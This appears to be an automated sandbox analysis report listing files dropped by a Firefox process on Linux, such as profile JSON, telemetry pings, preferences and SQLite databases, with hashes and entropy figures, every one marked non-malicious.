                                                                                                                              Preview:mozURLcachev002......+./usr/lib/firefox/distribution/policies.json.3.chrome/browser/content/browser/built_in_addons.json.O./home/saturnino/.mozilla/firefox/a3xevaya.default-release/addonStartup.json.lz4.0.chrome/en-US/locale/en-US/global/intl.properties.../usr/lib/firefox/distribution/distribution.ini.7.chrome/en-US/locale/en-US/global/aboutReader.properties.%.chrome/toolkit/content/global/xul.css...chrome/toolkit/skin/classic/global/tooltip.css...res/contenteditable.css.$.chrome/toolkit/res/counterstyles.css...res/designmode.css...chrome/toolkit/res/forms.css...chrome/toolkit/res/html.css...chrome/toolkit/res/mathml.css.-.chrome/toolkit/content/global/minimal-xul.css...chrome/toolkit/res/noframes.css...chrome/toolkit/res/noscript.css...chrome/toolkit/res/quirk.css.1.chrome/toolkit/skin/classic/global/scrollbars.css...res/svg.css...chrome/toolkit/res/ua.css.G./home/saturnino/.mozilla/firefox/a3xevaya.default-release/xulstore.json.%.localization/en-US/branding/brand.ftl.2.localization/e
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:Mozilla lz4 compressed data, originally 17200 bytes
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):8599
                                                                                                                              Entropy (8bit):6.567495269840381
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:oftuM9K/DTZ97Xjq7XN+ftuM9K/DrZd7q/qBXoa:ofsM9eH7Tq74fsM9enZd7uqBJ
                                                                                                                              MD5:A1D3DFDE4342A057ABB725F7326C08E9
                                                                                                                              SHA1:A0AC57260753854C4F43CFF75497507B9570BEC7
                                                                                                                              SHA-256:90B7DE98A0E12A8736D2D2B6A26516420A532165DE18349F16267BEBD2700AE9
                                                                                                                              SHA-512:723DC8DA47CCD8959828C71DEE300E70B5F58AA36193497FCFFAC05AEC03CCE6E45BCD2CCAE8AF8C1F0742EF28B04311971FCE4F043D47951197CCC569E8B61B
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:mozLz40.0C....{"app-system-addons":{"....reset-search-defaults@mozilla.com/..Gdependencies":[],"enabled":true,"lastModifiedTime":1629470033402,"loader":null,"path":|.....xpi","rootURI":"jar:file:///home/saturnino/...../firefox/a3xevaya....-release/fe5...es/%7Bb2669443-b5ea-44d6-8105-fcece6050402%7D/'..... !/...unInSafeMode ..signedState":3...D...162764250...,"telemetryKey$..3%40.......:2.1.0","version":"..#},......tection..;/11....g..~...8..6....o.......&.8512593....{.....Y1.0.1......startupData...p..astentL..!er...webRequest%..onBefore...[[{"incognito..UtabId..!yp...."main_frame"],"url...."https://www.google.../\.9*",!...amazon.de/exec/obidos/external3../6.ObingU..@duck..!go!..:..ebay.ch/sV...en.wikipedia.org/.../Special:S...*..dwindow....},["blocking"]]]}..`,"stag..%{}.....0.{....}............`.....doh-rollout..1org.....#a147618.......r......uusr/lib..vbrowser...U.......u.....l..V..{.}org:2.0b.....{.....formautofilld.T.s...e.+.V...f.(.W..g...........g..picturein...k.T.n..w...o.+.Z...
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):216
                                                                                                                              Entropy (8bit):4.755039128811985
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:YWLSf85jcM2MAfeKSyikXMDuQ6s/WoMmgjwHbSRmnPE2cb:YWLSf6gMAfzSy7MDNFMmqmpncBb
                                                                                                                              MD5:3F4783C4A6E2C30C125D1A3E464B8381
                                                                                                                              SHA1:E0341861A8E1E7A780AD941DBF2887C5C1DF734A
                                                                                                                              SHA-256:DE1D02EC9612920EF8E6FC72D437259756D96CFB2FC6973EF69B29E3EA04C769
                                                                                                                              SHA-512:9C580A197186EBBDB1DB70DE2945D93C68F07840BC0A207BCDEF7ECEDAC747F4B524279AD1CFE5EF32D309C0E548583AFCA912EC871F1FBC092415755EB93EBD
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:{"version":1,"listeners":{"remote-settings/monitor_changes":{"version":"\"1629467836325\"","sourceInfo":{"moduleURI":"resource://services-settings/remote-settings.js","symbolName":"remoteSettingsBroadcastHandler"}}}}
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 9, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 9
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):458752
                                                                                                                              Entropy (8bit):0.8648648126606621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:Ss1zkVmvQhyn+Zoz675wJt2dZ60ubZI3C18+PNliMM0zDZ8BX9W1zkVmvQhyn+Zi:SsCwJtZNuMP3OwJtZNuM0q
                                                                                                                              MD5:6C98B971D4FAA72DE2B8E0B158A7C9B1
                                                                                                                              SHA1:446C427743C3716FD3F13229D1E5C50BCDD72F38
                                                                                                                              SHA-256:B053591C9B62A13210FD5EB20BA5473174A8FC98E83E3D7BBB292F9D93FAAC7B
                                                                                                                              SHA-512:C1AD46CABACB1CC98B89F42B5AFEC9546ECAFF0DEC2FD3CB5FC0A23754B874FF312017D542B412968FF4D71AD0314C4F5F3014305BF93ED3DCDA4134BE8B069A
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:SQLite format 3......@ ..........................................................................S`.....z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):459912
                                                                                                                              Entropy (8bit):0.7972523651335922
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:HYsOTSZidZ60ubZI3C18+PNliMM0m41zkVmvQhyn+Zoz67vjPXxTZvwJt2dZ60uH:yYNuMjgwJtZNuMHs0
                                                                                                                              MD5:CD22FDD483A79AF48340AF16F46CE475
                                                                                                                              SHA1:8721B8AFE673D845CEE3483EC14710EAE990AF5D
                                                                                                                              SHA-256:DB08E9145EE54B1FA2E0465888E78C86688C9BD1EB86593EEED2257AD9BD0D20
                                                                                                                              SHA-512:F180BCCF5F023702744F273329D6740195A9E92EEC8B0CCF3CF5916B8C0054D53E179DED4E37B7CA7A7FF2E4909D2AB07FF6F46184B3FF46A7BE1F21A228C556
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:..............J...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R..R.k........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):66
                                                                                                                              Entropy (8bit):4.837595020998689
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                              MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                              SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                              SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                              SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):33575
                                                                                                                              Entropy (8bit):5.242975330910196
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:wGPsi3/WOtlxk6dxWnG9uQUtTmvwjQ4WUV6d6pxVs8:/ZtlxkEUG9uQUtQ4WUV6d6dR
                                                                                                                              MD5:FD00F4D294A70C2A0F0B064EF2C25089
                                                                                                                              SHA1:D69172218DE8A2A13EE0760B55FC6FDAAC3DB798
                                                                                                                              SHA-256:2EA958222985292CFF456D02939312E6A015F2F11284BC6E068F59282A5B2F47
                                                                                                                              SHA-512:27E534E41A3957F9E9C9468C35EBF6781C63C100DC3E1B946ACF5001A4910E8FAA577BA94766D4529F99B19DBB840AEE71B799DE19E8D2B341AEDF12FB4CE73B
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:{"type":"main","id":"7cc057ac-c8d2-4514-a64b-ee9e9cadc8d4","creationDate":"2022-10-18T22:44:56.231Z","version":4,"application":{"architecture":"x86-64","buildId":"20210816143654","name":"Firefox","version":"91.0.1","displayVersion":"91.0.1","vendor":"Mozilla","platformVersion":"91.0.1","xpcomAbi":"x86_64-gcc3","channel":"release"},"payload":{"ver":4,"simpleMeasurements":{"totalTime":73,"start":190,"main":1518,"selectProfile":2247,"afterProfileLocked":4675,"startupCrashDetectionBegin":5969,"startupCrashDetectionEnd":69015,"firstPaint":19251,"firstPaint2":16940,"sessionRestoreInit":8204,"sessionRestored":22974,"createTopLevelWindow":8229,"AMI_startup_begin":6038,"XPI_startup_begin":6048,"XPI_bootstrap_addons_begin":6088,"XPI_bootstrap_addons_end":6200,"XPI_startup_end":6200,"AMI_startup_end":6209,"XPI_finalUIStartup":8204,"sessionRestoreInitialized":8208,"delayedStartupStarted":16953,"delayedStartupFinished":17157,"startupInterrupted":0,"debuggerAttached":0,"activeTicks":0},"processes":{
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):22034
                                                                                                                              Entropy (8bit):4.167821089417648
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:0FvQVbUFvQVbJFvQVbWFvQVbZFvQVblFvQVbiFvQVbNFvQVb:JVbpVbsVbzVbcVbQVb3Vb4Vb
                                                                                                                              MD5:611049C1571EF868A7555D5D70639283
                                                                                                                              SHA1:D1B01CB17734385F285070AD05B9268213FCA5BA
                                                                                                                              SHA-256:E74DAA0115782DD0A1C8CFCB108312BE48EF2FF6A5C1818FD24DC234D30A3652
                                                                                                                              SHA-512:78333971D56DD53C368738FB761564CC94531311C99BB8E683F1D8F289726D3981A7B6E2E5F8DFC360F6B702D201B0CCE0F2D16302958DC16E268CB705175CCF
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:.................app....................glean_client_info#app_build#............................20210816143654........glean_client_info#app_channel.............................release%.......glean_client_info#app_display_version.............................91.0.1........glean_client_info#architecture.............................x86_64%.......glean_client_info#device_manufacturer.............................unknown........glean_client_info#device_model.............................unknown........glean_client_info#os.............................Linux........glean_client_info#os_version.............................5.4.........user............(.......baseline#glean.validation.first_run_hour<........3...........#.......2021-08-17T14:08:08.158120089+00:00............glean_client_info#client_id9........0...........$.......f80109fa-2a5b-4fd2-a42f-76603a7fb825 .......glean_client_info#first_run_date<........3...........#.......2021-08-17T14:08:08.158031120+00:00....%.......glean_internal_info#ba
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:ASCII text, with very long lines (447)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):527
                                                                                                                              Entropy (8bit):5.012153386589586
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:BG2asuzx4iAU7xNBHNFHU7+4DkD44DmHOVpI44ATO:BGzsGMUptF0y4DkD44DAUpIb7
                                                                                                                              MD5:0DA4833E2A466BE5171F371CED010FDA
                                                                                                                              SHA1:A94D1C160D5EFCF8FBA497AF6A6EEB65B74E7DEA
                                                                                                                              SHA-256:ECA82C27AA692F3DE8AE093CB6489A252844B66F5CE3FE76A1617BC3CAEC4F57
                                                                                                                              SHA-512:4BB7538B50E25B6368FF6EF1E5B1CE4427AE65B4996B5AB50911AC305A044D91ACF9221C045376746E7926D55DD45BEE7A2B4F8BDF578FB47706D3048C5A1682
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:/submit/firefox-desktop/deletion-request/1/b15353ee-6d41-4b99-a1da-728cade21808.{"ping_info":{"seq":0,"start_time":"2022-10-18T22:44+00:00","end_time":"2022-10-18T22:44+00:00","reason":"at_init"},"client_info":{"telemetry_sdk_build":"39.0.0","first_run_date":"2021-08-17+00:00","app_build":"20210816143654","device_model":"unknown","device_manufacturer":"unknown","os_version":"5.4","architecture":"x86_64","app_display_version":"91.0.1","app_channel":"release","os":"Linux","client_id":"f80109fa-2a5b-4fd2-a42f-76603a7fb825"}}
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):162
                                                                                                                              Entropy (8bit):4.845061834328155
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:YWAqKs+TsO0z+cgwHDWSxMf/GABYVXwdUIDXAYpJA2aqnLPJUoa/H5C:YWAqfssT+cLDWSKf/R4XjohOanLc/ZC
                                                                                                                              MD5:317EC4F7091A799815F3B5A65A7766BA
                                                                                                                              SHA1:AFACA0717840A6B966F6E1EE464CC595401FA9FD
                                                                                                                              SHA-256:E95F08F5AB23C6500358DE7B1CD245087C585A641CB2A3C70232BE8C162DD4B6
                                                                                                                              SHA-512:A1FF28D6D66B76A54A573622C92975DBE6BAFA741E333DCA02C04429BCFC68061CC35ED1F3E876F45E593B880CD808FDD8437608D099156AE2B68B136F7F02FD
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:{"sessionId":"c649b677-4de0-4ff8-b5cd-9c491cbab5b0","subsessionId":"b168edce-0669-4e0a-8e7a-2a14f2ed902f","profileSubsessionCounter":10,"newProfilePingSent":true}
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):51
                                                                                                                              Entropy (8bit):3.2717530240771033
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:YGJBQvAcgVgcVIDwf:YG8PgfiDE
                                                                                                                              MD5:3E32E2CC1ED028DD8FF9B06F50A4707B
                                                                                                                              SHA1:B3910351BD8E13AD1479DB699CF6FAC6544A5BEF
                                                                                                                              SHA-256:4A3A666D98E61B5FE06FECAC56807137A0FFFB4BB71D4C3B16BAA8702DDE738C
                                                                                                                              SHA-512:4585EE9EC04ADF138727CD039A9CBE78DB6CF2926F6CE92524312A42EFD1250100848A919EC4B833F9A013181CE93734575B86EED37F1BF32EFFA3237EBA84DB
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:{"clientID":"c0ffeec0-ffee-c0ff-eec0-ffeec0ffeec0"}
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):48713
                                                                                                                              Entropy (8bit):5.174045011351523
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:9On4M4wfVXy4nWXOxJO9/pN4sG4G4J4k4wh5hvM4r4y4l4G4O4gC6v4j:6ORpphfvG4co
                                                                                                                              MD5:CAAE9DFD85622A51E40BC81E527E6A7D
                                                                                                                              SHA1:8E1559A6C7E831446C791D827E4788EEF3FCFD59
                                                                                                                              SHA-256:836339FA04A74196FAB90D3128B1C4AFEB52876322A0DB38001BD87AAD660488
                                                                                                                              SHA-512:69053EBEBB03D84AF4FA8B1656B99F543F33414B039FEA55CB0F93BAA23AA169527DE10F9A45F6724A708BA8F638F4E4486D614FEC43EF85031C7572A95C9EE6
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:{"schemaVersion":33,"addons":[{"id":"doh-rollout@mozilla.org","syncGUID":"{0b694065-4b8a-4b9f-bc88-9f12b8b5cf70}","version":"2.0.0","type":"extension","loader":null,"updateURL":null,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"DoH Roll-Out","description":"This used to be a Mozilla add-on that supported the roll-out of DoH, but now only exists as a stub to enable migrations.","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1628151708000,"updateDate":1629147618000,"applyBackgroundUpdates":1,"path":"/usr/lib/firefox/browser/features/doh-rollout@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":"72.0a1","maxVersion":null}],"target
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):98304
                                                                                                                              Entropy (8bit):0.4037754857578377
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:mva0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vx6wfzs:m1zkVmvQhyn+Zoz67k6Ozs
                                                                                                                              MD5:8A55B40C82E3283E060F403CD722F656
                                                                                                                              SHA1:3AA85300160D844756A49761935AC24A230D9EDB
                                                                                                                              SHA-256:1F2CF3DA57260925046225A89482ABA14B82FA72806052D3C82EB455E895F9C0
                                                                                                                              SHA-512:B2391232BD245FB33072803237BFB6B2559FF16D4AFAE5CF6CEE6A96BBAB40623407BCBFD7138DD7B7B6CDCB7647D0A0DC1446F8FC5C66996A5E872FD5533B67
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):98852
                                                                                                                              Entropy (8bit):0.22709284916685019
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:ttVva0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23va:7V1zkVmvQhyn+Zoz67/
                                                                                                                              MD5:7A4AE3330542558C0CCB99191DC5D6DA
                                                                                                                              SHA1:74F251361EBA4E372E2C974A45F37C54146435B0
                                                                                                                              SHA-256:87AB9A816E4206F1E065DDF928745F277DB730A073E1E3AF35918F296FEC6F6F
                                                                                                                              SHA-512:331BEABCCC8B55A9DFE8B94BC91E26874E2BADFEBD1BFDF11CDEBC2AA7D948848E2AF173065788363DFE3132E55B450342DC2D39739EF667BF8CCFE869D903F6
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:............q..o........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:ASCII text, with very long lines (1127)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):97531
                                                                                                                              Entropy (8bit):5.219032360382777
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:xoyhNRoyhVRoyhjtoyhjvoyhjvoytjvoyt7voyto/:myyyiyoyeyeyKyiyC
                                                                                                                              MD5:2388F3474A57DB01C7BC0FDAF0A3FC30
                                                                                                                              SHA1:CB94B73A3A0F01727E0B439FAA43736B84A4EB6A
                                                                                                                              SHA-256:BDE738420C3F739429166FDD20D0B8F4D82291E3B5F4C0457D8D9F85A43E3BA1
                                                                                                                              SHA-512:8862F1F25FA73E62E63C6C6C4296E72614B7C19C3638077DA318FD413FB16ACDAE04163A3BD9A3ACEE6B7CEB5D739BF73110BA4938FF3FF2945376B36C31C502
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:// Mozilla User Preferences..// DO NOT EDIT THIS FILE..//.// If you make changes to this file while the application is running,.// the changes will be overwritten when the application exits..//.// To change a preference value, you can either:.// - modify it via the UI (e.g. via about:config in the browser); or.// - set it within a user.js file in your profile...user_pref("app.normandy.first_run", false);.user_pref("app.normandy.migrationsApplied", 12);.user_pref("app.normandy.startupRolloutPrefs.media.peerconnection.mtransport_process", true);.user_pref("app.normandy.startupRolloutPrefs.network.process.enabled", true);.user_pref("app.normandy.user_id", "e34bc139-ede7-4eef-acd2-d2d8ffa0c304");.user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1629470032);.user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1629466019);.user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1629467970);.user_pref("app.update.lastUpdateTime.region-update-timer", 0)
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:Mozilla lz4 compressed data, originally 467 bytes
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):196
                                                                                                                              Entropy (8bit):5.4478819013219715
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:vXvz2SNtSapaBlP7521T06xz3Jg75I2k7TEv2X8W6:vvz2SNtjpOPWgsz3JYk7vq
                                                                                                                              MD5:DE18406D63DF1F173806E777DABDADFB
                                                                                                                              SHA1:076F314F75C8555C0220BB0EF7129750D9B1B9C8
                                                                                                                              SHA-256:89F9037A361F2A097E61121697426233D8D8AF5B6E18E92D6612E8D65D0A562C
                                                                                                                              SHA-512:0E94A9D0D5DAC99BC07C1C9C191EDE376041D8C43D3B9DAC99A47ABE451C518B8F65EF6513A0956B9FC72AF96A05A7A81040257C40A26215F91841C7488C93B2
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:mozLz40......A{"version":6,"engines":[{"_name":"Google","_isAppProvided":true,"_metaData":{}},8..Wikipedia (en)@..OBing6...Amazon.d.. @Duck../Gow..OeBay6.....?com<..7],"o..."useSavedOrder":false}}
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):143
                                                                                                                              Entropy (8bit):4.223691028533093
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:YVXKQJAyiVLQwJtJDBA+ABaQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+kOy6Lb1BA+m2L69Yr
                                                                                                                              MD5:C0E4C22C50DD21142F57714EF49B8713
                                                                                                                              SHA1:06B77307DCA5C889EA279243E74730CBC10801BE
                                                                                                                              SHA-256:6FE46B65B76B3DF32D8392853740B35ED75B6E23F4FBD6F45F3EFA1D496E6717
                                                                                                                              SHA-512:A4516B4F15EDB429F7B8CE3EA709D3777BFCC590838B1E113147E6BFB4DF0F34F0F2B24F6185D4E4277A77F75711BB470461B86AA507921AF037A6D22DF9278E
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:{"profile-after-change":true,"final-ui-startup":true}{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:Mozilla lz4 compressed data, originally 4099 bytes
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7029
                                                                                                                              Entropy (8bit):6.3583390628148635
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:EZRclAMkhnZRclSMkhoZRclxeMkhVZRclFMkhmZRclmMk4D:acls5cl6IclxerclzKclmW
                                                                                                                              MD5:A3A898B19719AF7F04F72104A0AFD5D4
                                                                                                                              SHA1:543A9F7B9F01358986D828D89AC5EC3DFC297995
                                                                                                                              SHA-256:79C9F8AF2BAFDE09F29A9CA5E4D157F7435499275947F32671B8B48DEAD28580
                                                                                                                              SHA-512:CE22AB0EB98B37ACEA46C79E952B6249A5E64A3C4071505531578E179DF383FC5692B57444FD867BE7FDDCC4FDCF6BD8277A0F0A6848C4D64655E852B451A7E6
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"about:blank","title....cacheKey":0,"ID":1,"docshellUU...6"{19f5e046-3fa5-4f7f-a2be-a435e5e54bbb}","resultPrincipalURI":null,"p...rToInherit_base64":"eyIwIjp7IjAiOiJtb3otbnVsbHByaW5jaXBhbDp7ODdjMGNhYTMtOGZiNi00MDZkLTkxMDAtZTY3NWQ2NWJjMDQwfSJ9fQ==","partitioned.....c..hasUserInteract....false,"triggeringB..%..z%.0fX0....docIdentifier":2147483649,"persistW...}],"lastAccessed":1666133066446,"hidden...,"searchMode...userContextId&..attributl..{},"index9..requestedI..s0,"imagL....aselect...,"_closedT..u],"busy....width":921,"height":666,"screenX":4...Y..Aizem..."maximized"...BeforeMin...&..workspace..S0","z...1...Wz...........w.......1":{v.hUpdatet..517,"startTim..P31747A..centCrash^..0},"globalj.Bcook......S..!Stg..8.;Ghome7..New Tab3....387a7475-8923-4191-a685-829ff165a6203.Q..Q1ZTllNTUtYzUwMi00Zjk2LThhMzAtOWNmMjRhZGMxYjNl3.I...&.3.X@true...2..294700470422.V.."chrome://branding/c...nt/icon32.png"...T...G.v.K..
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):28672
                                                                                                                              Entropy (8bit):6.117080021933792
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:K3sCJm3z3a3M3jWHjF2NNrnsrx4Nab6MSBHhap6Ul22y1HaqeHhcHm91Hp:K3o3z3a3M3Ojf1kBHhap6Ul2n1HaqeH3
                                                                                                                              MD5:2672D6B57621B74D060C6FC399DFCADD
                                                                                                                              SHA1:7500A1E08D82966806E231D3DA34B211151B5457
                                                                                                                              SHA-256:DA329DDB72B5E05874BA4E78B0D524F19BC200A0A539F6CDB273BDFAD304A65D
                                                                                                                              SHA-512:643877BCEB2B0A74AF8B559B6060D30121FBC82B7AFBAF29BD62EC0985E3069F3434A1D6C0C29028188D98037DCABB1ADE1ABBBBDBAA895849D5DF620CD53151
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:.... ......l...e...........n.........S.v.....`...n.l...*.........,.D...j...F...~.......>.....N..............................................................................R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0f:9d774e.519e.5:12.:777.77f78b4195c5\..D~....nbjo0tfbsdi.dpogjh...w .....nbjo0tfbsdi.dpogjh.0d61edd98.12:3.5572.cc99.28b66cb292d8R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0d61edd98.12:3.5572.cc99.28b66cb292d8\..D~....nbjo0tfbsdi.dpogjh...w .....nbjo0tfbsdi.dpogjh.0g6:geecd.691c.5783.:deb.43:52dffd83:R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0g6:geecd.691c.5783.:deb.43:52dffd83:\..D~....nbjo0tfbsdi.dpogjh...w .....nbjo0tfbsdi.dpogjh.0f1db5:75.f435.55f8.91c7.27b942817e28R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0f1db5:75.f435.55f8.91c7.27b94...._..F......nbjo0qbttxpse.svmft...w..s2.nbjo0qbttxpse.svmft.0cg9f6958.c121.534f.:679.f2ed88g9g319...._..F......nbjo0qbttxpse.svmft...w..s*`.nbjo0qbttxpse.svmft.0113b2f6e.5dg7.5:65.96b:.6e1f8d1edbge...8U..4....0nbjo0qbttxp
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):41232
                                                                                                                              Entropy (8bit):6.164837279524788
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:Q3sCJE3z3a3M3jWNq68VNNrnsrx4Nab6MbBHhap6Ul2R6jadF1HDjeHhcHm91HKw:Q3O3z3a3M3Mqc1NBHhap6Ul2R6ja31HU
                                                                                                                              MD5:7A771A5F42D8BF7357D1586D67871B14
                                                                                                                              SHA1:C8E9FA0C10DA2957229436F83D6880899D29A1C5
                                                                                                                              SHA-256:0E4BA37296F40929FE5278F755CFFB1D66331654BF7FF42FB8EF417122C0ADF2
                                                                                                                              SHA-512:F996560F7059AA0D2FF803F644B82AF0DB9DEC53188E2650A1E8756A940DE9926AAFC0391BA921C20DB9E9D3449BC0A3668C444753B279D51E265F1BF80E5C71
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
